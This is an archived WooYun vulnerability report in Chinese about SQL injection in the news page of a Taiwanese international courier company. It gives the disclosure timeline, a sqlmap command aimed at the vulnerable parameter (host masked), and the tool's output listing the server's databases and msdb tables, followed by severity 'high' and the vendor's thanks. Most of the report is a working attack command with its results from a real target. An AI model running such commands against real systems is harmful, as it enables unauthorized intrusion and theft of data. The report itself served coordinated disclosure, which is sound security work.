乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-17: 厂商已经确认,细节仅向厂商公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
台湾某国际快递公司SQL注入
注入点sqlmap.py -u "http://**.**.**.**/news_detail.asp?n_id=129" --dbs
available databases [12]:[*] DPEXBOHQ[*] DPEXEXTBILL[*] DPEXWEB[*] master[*] model[*] msdb[*] MSDPEX95[*] MSDPEX97[*] MSOPS[*] Northwind[*] pubs[*] tempdbDatabase: msdb[78 tables]+-----------------------------+| RTblClassDefs || RTblClassExtension || RTblDBMProps || RTblDBXProps || RTblDTMProps || RTblDTSProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblOLPProps || RTblParameterDef || RTblPropDefs || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelshipProps || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks || restorefile || restorefilegroup || restorehistory || sqlagent_info || sysalerts || syscachedcredentials || syscategories || sysconstraints || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobhistory || sysjobs || sysjobs_view || sysjobschedules || sysjobservers || sysjobsteps || sysnotifications || sysoperators || syssegments || systargetservergroupmembers || systargetservergroups || systargetservers || systargetservers_view || systaskids || systasks || systasks_view |+-----------------------------+
综上
你们懂
危害等级:高
漏洞Rank:12
确认时间:2015-09-17 10:02
感謝通知!
暂无